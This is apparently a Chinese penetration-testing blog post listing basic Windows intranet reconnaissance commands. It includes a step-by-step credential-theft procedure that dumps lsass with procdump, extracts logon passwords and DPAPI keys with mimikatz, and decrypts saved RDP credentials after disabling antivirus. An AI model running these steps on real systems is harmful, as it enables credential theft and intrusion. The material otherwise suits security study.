当前位置: 首页 > news >正文

【内网渗透】内网信息收集的十三种基本方式

news 来源:原创 2024/9/21 11:07:51

本文的主题为基本的信息收集方式,不包含域内信息收集,域内信息收集得再过几天看看,用的windows server 2019内核版本比较高,还有一些信息收集技巧行不通,比如检查杀毒软件情况,就不举例了

一些工具准备
mimikatz:https://github.com/ParrotSec/mimikatz
​
ProcDump:https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump
当前用户信息

查看当前用户信息,RID,组信息,特权信息

whoami /all

image-20240905101003965

image-20240905101020438

image-20240905101033968

系统信息
systeminfo

image-20240905142138399

网络及端口状态
netstat -an

这里,-a 表示显示所有连接和监听端口,-n 表示以数字形式显示地址和端口号。

image-20240905143044809

LISTENING:表示监听中,这个端口正在开放,可以提供服务

SYN_SENT:客户端已经发送连接请求(SYN),并正在等待服务器的确认(SYN-ACK报文)。这是TCP三次握手过程中的一个状态。

CLOSED:连接已关闭,不再存在。

TIME_WAIT:连接已关闭,但TCP协议规定在这段时间内(通常是2倍的最大报文存活时间,即2MSL)不能立即使用该连接相同的四元组(源IP、源端口、目标IP、目标端口)建立新的连接,以防止旧连接的残留数据干扰新连接。【MSL,报文最大生存时间可能是30秒、1分钟或2分钟,取决于操作系统】

ESTABLISHED:连接已成功建立,数据可以在客户端和服务器之间双向传输。比如HTTP/HTTPS,FTP,SMTP,SSH,MYSQL,RDP(windows远程桌面服务)等

当前主机名称
hostname

image-20240905145123833

当前操作系统
wmic OS

image-20240905145455078

这么不好看?就使用get命令对每一列进行筛选,赛选常用的信息

image-20240905145635717

wmic OS get Caption,CSDVersion,OSArchitecture,Version

image-20240905145906782

安装的应用程序
wmic product get name,version

image-20240905154110362

在线用户
quser

image-20240905154228123

网络配置
ipconfig /all

image-20240905154307635

查看进程
tasklist /v

image-20240905161009326

查看当前登录域
net config workstation

image-20240905161459979

远程桌面连接历史记录

有的话就有,可以把凭证取下来进行本地解密、没有的话会显示无

cmdkey /list

image-20240905161920815

以下是解密过程(失败了)参考的:https://www.cnblogs.com/websecyw/p/12842741.html

查看是否存在凭证,记录好这个红色框值,和目录进行拼接

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
# 拼接后的文件路径待会要用
C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

image-20240905181423506

lsass.dmp文件默认情况下并不能直接复制,所以要用到procdump工具打包凭证信息(本文演示的为没有杀毒的操作,记得先关闭杀毒软件,不然会拒绝访问)

procdump.exe -accepteula -ma lsass.exe lsass.dmp

image-20240905164311440

把这个目录下得lsass.dmp复制到mimikatz目录下

copy lsass.dmp C:\Users\Administrator\Desktop\mimikatz\mimikatz

image-20240905175840747

使用工具mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

image-20240905180631025

记录好guidMasterKey,为{a77cdf8b-ca6e-4a91-a406-d1ab7105712e}

image-20240905184525397

获取对应得MasterKey

sekurlsa::dpapi

image-20240905181115959

找到之前所对应得guid得到masterkey,使用Masterkey解密凭证得到明文密码

dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:fcffc5d85122c8bb31d33e927009e0c939b65a1d335565e7c5e12fd17555b625ad6a6fc03244dad05c0f026d1e425fcb5d8dc77bd4c6205d847e7526e6b2f38b

确保你的系统没有打补丁(也许不是补丁,我用的winserver2019),不然就解密失败,这里我的失败了,下次再试试

本机用户
net user

image-20240905190433411

某用户的X信息
net user 用户名

image-20240905190607174

往期推荐

【JS逆向】某大型音乐平台JS逆向分析

【流量分析】Java框架Shiro、工具利用、漏洞复现以及流量特征分析

【渗透测试】12种rbash逃逸方式总结

最新可用,bp+charles小程序抓包教程

DocCMS 网站存在SQL注入漏洞

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • nvidia-cuda-tensorrt-cudnn下载网站
  • LLM 模型压缩之三: FoldGPT
  • 高级算法设计与分析 学习笔记3 哈希表
  • maven-helper插件解决jar包冲突实战
  • 使用udp进行通信
  • 宏碁扩展Swift系列,推出四款全新AI笔记本电脑
  • 番外 1 : 安装 docker 和 docker-compose
  • Oracl查询报错:ORA-29275: 部分多字节字符
  • vscode spring boot项目编辑yaml不自动提示补全如何解决
  • 计算机网络13——IM聊天系统——网络功能实现——UDP
  • Oracle高级压缩和透明数据加密组合实验
  • CSS学习6
  • CSS中 特殊类型的选择器 伪元素如何使用
  • python文件自动化(4)
  • XMind v24 激活,简单一键激活
  • 【comparator, comparable】小总结
  • CSS盒模型深入
  • express.js的介绍及使用
  • HTTP 简介
  • JavaScript服务器推送技术之 WebSocket
  • JAVA多线程机制解析-volatilesynchronized
  • Laravel Mix运行时关于es2015报错解决方案
  • Node + FFmpeg 实现Canvas动画导出视频
  • React Native移动开发实战-3-实现页面间的数据传递
  • Spring Cloud Alibaba迁移指南(一):一行代码从 Hystrix 迁移到 Sentinel
  • SQLServer之创建数据库快照
  • SQLServer之创建显式事务
  • 发布国内首个无服务器容器服务,运维效率从未如此高效
  • 警报:线上事故之CountDownLatch的威力
  • 如何设计一个比特币钱包服务
  • 它承受着该等级不该有的简单, leetcode 564 寻找最近的回文数
  • 06-01 点餐小程序前台界面搭建
  • 阿里云重庆大学大数据训练营落地分享
  • ​创新驱动,边缘计算领袖:亚马逊云科技海外服务器服务再进化
  • ​猴子吃桃问题:每天都吃了前一天剩下的一半多一个。
  • #FPGA(基础知识)
  • #Linux杂记--将Python3的源码编译为.so文件方法与Linux环境下的交叉编译方法
  • $(function(){})与(function($){....})(jQuery)的区别
  • (1)(1.8) MSP(MultiWii 串行协议)(4.1 版)
  • (1)(1.9) MSP (version 4.2)
  • (C)一些题4
  • (附源码)php投票系统 毕业设计 121500
  • (顺序)容器的好伴侣 --- 容器适配器
  • .net core IResultFilter 的 OnResultExecuted和OnResultExecuting的区别
  • .net core 管理用户机密
  • .NET Framework 3.5安装教程
  • .NET 设计模式—简单工厂(Simple Factory Pattern)
  • .NET/ASP.NETMVC 大型站点架构设计—迁移Model元数据设置项(自定义元数据提供程序)...
  • .Net6支持的操作系统版本(.net8已来,你还在用.netframework4.5吗)
  • .NetCore发布到IIS
  • .NET关于 跳过SSL中遇到的问题
  • .NET和.COM和.CN域名区别
  • .NET简谈设计模式之(单件模式)
  • .NET开源的一个小而快并且功能强大的 Windows 动态桌面软件 - DreamScene2
  • @angular/cli项目构建--http(2)